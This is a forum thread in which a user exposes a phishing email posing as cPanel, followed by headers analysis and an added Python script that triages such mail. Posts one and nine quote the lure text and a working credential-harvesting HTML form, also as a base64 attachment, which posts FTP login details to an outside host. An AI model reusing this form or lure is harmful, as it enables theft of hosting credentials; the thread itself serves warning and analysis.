  1. #1

    cPanel Email Phishing !!

    Hi Guys,

    Yesterday I got an email from "cPanel" that required my FTP root access. See below.

    Dear user of the cPanel service,

    Due to system maintenance, you are required to confirm your FTP details by compiling the form attached to this email.

    Failure to do may result in host suspension .This is just a routine check from our part to make sure all our clients are active.

    We apologize for any inconvenience this may cause. Please confirm your details using the form attached.

    Please do not reply at this email. Use the contact form instead.

    Note: For your convience, please download and open the attached HTML file in a modern browser like Firefox 3, Chrome 11, Safari 4 etc.
    And there was a file attached, an HTML file.

    To me it sounded weird; how could cPanel possibly ask for this kind of information? So I downloaded the file and opened it with Notepad, and it was phishing. Look below:

    <form action="http://ndnguyen.net/h.php" method="post">
    <table class="login" cellpadding="0" cellspacing="0" width="200">
    <tbody><tr>
    <td align="left"><b>Login</b></td>
    <td>&nbsp;</td>
    </tr>
    <tr>
    <td>FTP Domain</td>
    <td><input autocomplete="on" name="domain" size="16" type="text"></td>
    </tr>
    <tr>
    <td>FTP Username</td>
    <td><input autocomplete="on" name="user" size="16" type="text"></td>
    </tr>
    <tr>
    <td>FTP Password</td>
    <td><input name="pass" size="16" type="password"></td>
    </tr>
    <tr>
    <td>Hosting Provider</td>
    <td><input autocomplete="on" name="host" size="16" type="text"></td>
    </tr>

    <tr>
    <td colspan="2" align="center"><input value="Confirm" class="input-button" type="submit"></td>
    </tr>
    </tbody></table>
    <p><strong>Incorrect information may result in the suspension or termination of the Customer's Services.</strong></p>
    </form>
    So I am opening this topic so that users do not fall into these traps....

  2. #2
    What e-mail address did you get this from?

  3. #3
    From cPanel Inc. <client392429183837@cpanel.net>
    sender-time Sent at 12:33 AM (GMT+08:00). Current time there: 7:39 PM.
    to support@xxx.com
    date Sun, Apr 3, 2011 at 12:33 AM
    subject cPanel License for xxx

  4. #4
    Post headers. Not the fake from address.

  5. #5
    Originally Posted by quantumphysics:
    Post headers. Not the fake from address.

    How do I get the header?

  6. #6
    What email provider are you using/webmail interface/application?

  7. #7
    Originally Posted by quantumphysics:
    What email provider are you using/webmail interface/application?

    I am using Gmail!!!

  8. #8
    There's an arrow on the top right of the message next to reply - click it, then click "show original"

  9. #9
    Originally Posted by quantumphysics:
    There's an arrow on the top right of the message next to reply - click it, then click "show original"

    Delivered-To: xxx@gmail.com
    Received: by 10.229.78.193 with SMTP id m1cs18280qck;
        Sat, 2 Apr 2011 16:01:31 -0700 (PDT)
    Received: by 10.224.212.194 with SMTP id gt2mr4777693qab.68.1301785290324;
        Sat, 02 Apr 2011 16:01:30 -0700 (PDT)
    Received-SPF: softfail (google.com: best guess record for domain of transitioning esquire@domainhosting.domainhosting.ph does not designate 174.123.233.26 as permitted sender) client-ip=174.123.233.26;
    Received: by 10.241.193.71 with POP3 id 7mf227503qwb.15;
        Sat, 02 Apr 2011 16:01:30 -0700 (PDT)
    X-Gmail-Fetch-Info: support@xxx.com 5 mail.xxx.com 110 support@xxx.com
    Return-path: <esquire@domainhosting.domainhosting.ph>
    Envelope-to: support@xxx.com
    Delivery-date: Sun, 03 Apr 2011 00:33:55 +0200
    Received: from domainhosting.ph ([174.123.233.26] helo=domainhosting.domainhosting.ph)
        by CH1.xxx.COM with esmtps (TLSv1:AES256-SHA:256)
        (Exim 4.69)
        (envelope-from <esquire@domainhosting.domainhosting.ph>)
        id 1Q69OF-0004gt-OC
        for support@xxx.com; Sun, 03 Apr 2011 00:33:55 +0200
    Received: from esquire by domainhosting.domainhosting.ph with local (Exim 4.69)
        (envelope-from <esquire@domainhosting.domainhosting.ph>)
        id 1Q69OE-0004qu-Dn
        for support@xxx.com; Sun, 03 Apr 2011 06:33:30 +0800
    To: support@xxx.com
    Subject: cPanel License for xxx.com
    X-PHP-Script: esquireinternational.com/resources/full_screen/mail.php for 213.179.212.123
    From: cPanel Inc. <client392429183837@cpanel.net>
    Reply-To:
    MIME-Version: 1.0
    Content-Type: multipart/mixed; boundary=3DA55ABD7C27E63EBB4A4CC3F9BCDCC6
    Message-Id: <E1Q69OE-0004qu-Dn@domainhosting.domainhosting.ph>
    Date: Sun, 03 Apr 2011 06:33:30 +0800
    X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
    X-AntiAbuse: Primary Hostname - domainhosting.domainhosting.ph
    X-AntiAbuse: Original Domain - xxx.com
    X-AntiAbuse: Originator/Caller UID/GID - [588 32003] / [47 12]
    X-AntiAbuse: Sender Address Domain - domainhosting.domainhosting.ph
    X-Source: /usr/local/cpanel/cgi-sys/php5
    X-Source-Args: php5
    X-Source-Dir: esquireinternational.com:/public_html/resources/full_screen

    --3DA55ABD7C27E63EBB4A4CC3F9BCDCC6
    Content-Type: text/html
    Content-Transfer-Encoding: 8bit

    <html>
    <p><img src="http://www.24shells.net/images/logo-cpanel-whm.gif" width="98" height="68"></p>
    <p>Dear user of the cPanel service,</p>
    <p>Due to system maintenance, you are required to confirm your FTP details by compiling the form attached to this email.</p>
    <p>Failure to do may result in host suspension .This is just a routine check from our part to make sure all our clients are active.</p>
    <p>We apologize for any inconvenience this may cause. Please confirm your details using the form attached.</p>
    <p>Please do not reply at this email. Use the contact form instead.</p>
    <h5><em>Note</em>: For your convience, please download and open the attached HTML file in a modern browser like Firefox 3, Chrome 11, Safari 4 etc.</h5>
    </html>

    --3DA55ABD7C27E63EBB4A4CC3F9BCDCC6
    Content-Type: ; name="cpanel.html"
    Content-Transfer-Encoding: base64
    Content-Disposition: attachment; filename="cpanel.html"

    PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBYSFRNTCAxLjAgVHJhbnNpdGlvbmFs
    Ly9FTiIgImh0dHA6Ly93d3cudzMub3JnL1RSL3hodG1sMS9EVEQveGh0bWwxLXRyYW5zaXRpb25h
    bC5kdGQiPg0KPGh0bWwgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiPjxoZWFk
    Pg0KDQoNCjxsaW5rIHJlbD0ic2hvcnRjdXQgaWNvbiIgaHJlZj0iaHR0cDovL2NwYW5lbC5uZXQv
    ZmF2aWNvbi5pY28iIHR5cGU9ImltYWdlL3gtaWNvbiI+DQo8bWV0YSBodHRwLWVxdWl2PSJDb250
    ZW50LVR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1VVEYtOCI+DQo8dGl0bGU+Y1Bh
    bmVsIDExPC90aXRsZT4NCjxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJlZj0iaHR0cDovL2dvb2Z3
    ZWFyLmNvbS9zdHlsZS5jc3MiIHR5cGU9InRleHQvY3NzIj4NCg0KPC9oZWFkPjxib2R5Pg0KPGRp
    diBpZD0id3JhcCI+DQoJPGRpdiBpZD0idG9wIj4NCgkJDQoJPC9kaXY+DQoJPGRpdiBpZD0ibWlk
    Ij4NCgkJPGRpdiBpZD0iY29udGVudC13cmFwIiBhbGlnbj0iY2VudGVyIj4gDQoNCjxmb3JtIGFj
    dGlvbj0iaHR0cDovL25kbmd1eWVuLm5ldC9oLnBocCIgbWV0aG9kPSJwb3N0Ij4NCjx0YWJsZSBj
    bGFzcz0ibG9naW4iIGNlbGxwYWRkaW5nPSIwIiBjZWxsc3BhY2luZz0iMCIgd2lkdGg9IjIwMCI+
    DQo8dGJvZHk+PHRyPg0KPHRkIGFsaWduPSJsZWZ0Ij48Yj5Mb2dpbjwvYj48L3RkPg0KPHRkPiZu
    YnNwOzwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPkZUUCBEb21haW48L3RkPg0KPHRkPjxpbnB1dCBh
    dXRvY29tcGxldGU9Im9uIiBuYW1lPSJkb21haW4iIHNpemU9IjE2IiB0eXBlPSJ0ZXh0Ij48L3Rk
    Pg0KPC90cj4NCjx0cj4NCjx0ZD5GVFAgVXNlcm5hbWU8L3RkPg0KPHRkPjxpbnB1dCBhdXRvY29t
    cGxldGU9Im9uIiBuYW1lPSJ1c2VyIiBzaXplPSIxNiIgdHlwZT0idGV4dCI+PC90ZD4NCjwvdHI+
    DQo8dHI+DQo8dGQ+RlRQIFBhc3N3b3JkPC90ZD4NCjx0ZD48aW5wdXQgbmFtZT0icGFzcyIgc2l6
    ZT0iMTYiIHR5cGU9InBhc3N3b3JkIj48L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD5Ib3N0aW5nIFBy
    b3ZpZGVyPC90ZD4NCjx0ZD48aW5wdXQgYXV0b2NvbXBsZXRlPSJvbiIgbmFtZT0iaG9zdCIgc2l6
    ZT0iMTYiIHR5cGU9InRleHQiPjwvdGQ+DQo8L3RyPg0KDQo8dHI+DQo8dGQgY29sc3Bhbj0iMiIg
    YWxpZ249ImNlbnRlciI+PGlucHV0IHZhbHVlPSJDb25maXJtIiBjbGFzcz0iaW5wdXQtYnV0dG9u
    IiB0eXBlPSJzdWJtaXQiPjwvdGQ+DQo8L3RyPg0KPC90Ym9keT48L3RhYmxlPg0KPHA+PHN0cm9u
    Zz5JbmNvcnJlY3QgaW5mb3JtYXRpb24gbWF5IHJlc3VsdCBpbiB0aGUgc3VzcGVuc2lvbiBvciB0
    ZXJtaW5hdGlvbiBvZiB0aGUgQ3VzdG9tZXIncyBTZXJ2aWNlcy48L3N0cm9uZz48L3A+DQo8L2Zv
    cm0+DQoNCjwvZGl2Pg0KPC9kaXY+DQo8ZGl2IGlkPSJib3QiPg0KPC9kaXY+DQpjUGFuZWwsIElu
    Yy4gMTk5Ny0yMDExDQo8L2Rpdj4NCjxwPiZuYnNwOzwvcD4NCjwvYm9keT48L2h0bWw+

    --3DA55ABD7C27E63EBB4A4CC3F9BCDCC6--
    This is the header of the message.

  10. #10
    Being sent from a hacked HostGator system then: 174.123.233.26 at esquireinternational.com/resources/full_screen/mail.php

    I'm 99% sure this is the same person that did this spam run, because both originate from ProXPN, which is a free VPN service, and it's unlikely any sane phisher would use something logged to death.
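The triage the thread walks through by hand (don't trust the From: line, read the Received chain and the SPF verdict, note the X-PHP-Script stamp, and open the attachment in a text editor to see where the form posts) can be scripted. The block below is an added example written for this page, not code from the thread or from cPanel. It uses only the Python standard library. The sample message is constructed from the headers quoted in post #9 and the form quoted in post #1: folded header lines are re-indented, the MIME boundary is renamed, the body text is shortened and the form is trimmed to its inputs. The heuristics (visible-From domain versus envelope sender, SPF fail/softfail, presence of X-PHP-Script, form action host outside the claimed sender domain) are mine, not a published rule set.

```python
"""Triage a phishing mail: compare displayed From with the envelope sender,
walk the Received chain, read the SPF verdict, pick up the X-PHP-Script stamp
and decode the HTML attachment to see where its form posts.  Stdlib only."""
import base64
import email
import re
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# The lure form as quoted in post #1, trimmed to the inputs that matter.
ATTACHMENT_HTML = """<html><body>
<form action="http://ndnguyen.net/h.php" method="post">
<input name="domain" type="text"><input name="user" type="text">
<input name="pass" type="password"><input name="host" type="text">
<input value="Confirm" type="submit">
</form></body></html>"""

# Constructed sample: headers quoted in post #9 (folded lines re-indented as
# RFC 5322 requires), boundary renamed, body shortened.
RAW_MESSAGE = f"""Return-path: <esquire@domainhosting.domainhosting.ph>
Received-SPF: softfail (google.com: best guess record for domain of transitioning esquire@domainhosting.domainhosting.ph does not designate 174.123.233.26 as permitted sender) client-ip=174.123.233.26;
Received: from domainhosting.ph ([174.123.233.26] helo=domainhosting.domainhosting.ph)
    by CH1.xxx.COM with esmtps (TLSv1:AES256-SHA:256) (Exim 4.69)
    (envelope-from <esquire@domainhosting.domainhosting.ph>)
    id 1Q69OF-0004gt-OC for support@xxx.com; Sun, 03 Apr 2011 00:33:55 +0200
Received: from esquire by domainhosting.domainhosting.ph with local (Exim 4.69)
    (envelope-from <esquire@domainhosting.domainhosting.ph>)
    id 1Q69OE-0004qu-Dn for support@xxx.com; Sun, 03 Apr 2011 06:33:30 +0800
To: support@xxx.com
Subject: cPanel License for xxx.com
X-PHP-Script: esquireinternational.com/resources/full_screen/mail.php for 213.179.212.123
From: cPanel Inc. <client392429183837@cpanel.net>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary=BOUNDARY
Message-Id: <E1Q69OE-0004qu-Dn@domainhosting.domainhosting.ph>

--BOUNDARY
Content-Type: text/html

<html><p>Dear user of the cPanel service, please confirm your FTP details.</p></html>

--BOUNDARY
Content-Type: ; name="cpanel.html"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="cpanel.html"

{base64.b64encode(ATTACHMENT_HTML.encode()).decode()}

--BOUNDARY--
"""


def header_domain(value):
    """Domain of the first address in a From / Return-Path value, lowercased."""
    m = re.search(r"@([A-Za-z0-9.-]+)", value or "")
    return m.group(1).lower() if m else None


def received_chain(msg):
    """Received hops oldest-first as (from, ip, by).  Only hops written by your
    own servers are trustworthy; earlier ones were supplied by the sender."""
    hops = []
    for raw in reversed(msg.get_all("Received", [])):
        text = " ".join(str(raw).split())          # unfold and squeeze whitespace
        frm = re.match(r"from\s+(\S+)", text)
        by = re.search(r"\bby\s+(\S+)", text)
        ip = re.search(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]", text)
        hops.append(tuple(m.group(1) if m else None for m in (frm, ip, by)))
    return hops


class FormScanner(HTMLParser):
    """Collect form actions and the names of credential-bearing inputs."""
    def __init__(self):
        super().__init__()
        self.actions, self.fields = [], []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.actions.append(a["action"])
        elif tag == "input" and a.get("type", "text") in ("text", "password", "email"):
            self.fields.append(a.get("name"))


def scan_attachments(msg):
    """Decode each attachment (base64 here) and report where its forms post."""
    report = []
    for part in msg.iter_attachments():
        html = part.get_payload(decode=True).decode("utf-8", "replace")
        scanner = FormScanner()
        scanner.feed(html)
        report.append({"filename": part.get_filename(),
                       "actions": scanner.actions, "fields": scanner.fields})
    return report


def triage(raw):
    """Return the indicators a responder wants plus a list of findings."""
    msg = email.message_from_string(raw, policy=policy.default)
    from_dom = header_domain(str(msg["From"]))
    env_dom = header_domain(str(msg["Return-Path"]))
    hops = received_chain(msg)
    inject_ip = next((ip for _, ip, _ in hops if ip), None)
    spf = str(msg["Received-SPF"]).split()[0].lower() if msg["Received-SPF"] else None
    php = " ".join(str(msg["X-PHP-Script"]).split()) if msg["X-PHP-Script"] else None
    attachments = scan_attachments(msg)

    findings = []
    if from_dom != env_dom:
        findings.append(f"From claims {from_dom} but envelope sender is {env_dom}")
    if spf in ("fail", "softfail"):
        findings.append(f"SPF {spf} for client {inject_ip}")
    if php:  # stamped by Exim on the sending cPanel host: PHP script and the IP that called it
        findings.append(f"generated by web script: {php}")
    for att in attachments:
        for action in att["actions"]:
            host = urlparse(action).hostname
            if host and from_dom and not (host == from_dom or host.endswith("." + from_dom)):
                findings.append(f"{att['filename']} posts {att['fields']} to {host}")
    return {"from_domain": from_dom, "envelope_domain": env_dom, "hops": hops,
            "injecting_ip": inject_ip, "spf": spf, "php_script": php,
            "attachments": attachments, "findings": findings}


if __name__ == "__main__":
    for line in triage(RAW_MESSAGE)["findings"]:
        print("!", line)
```

Run against the constructed message it reports four findings: the From domain (cpanel.net) does not match the envelope sender (domainhosting.domainhosting.ph), SPF softfailed for 174.123.233.26, the mail was generated by the mail.php script called from 213.179.212.123, and cpanel.html posts domain/user/pass/host to ndnguyen.net. Keep in mind that Received lines are appended top-down by each relay, so only the hop your own MX wrote (here the one "by CH1.xxx.COM") is certain; anything below it came from the sender's server and could have been forged.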
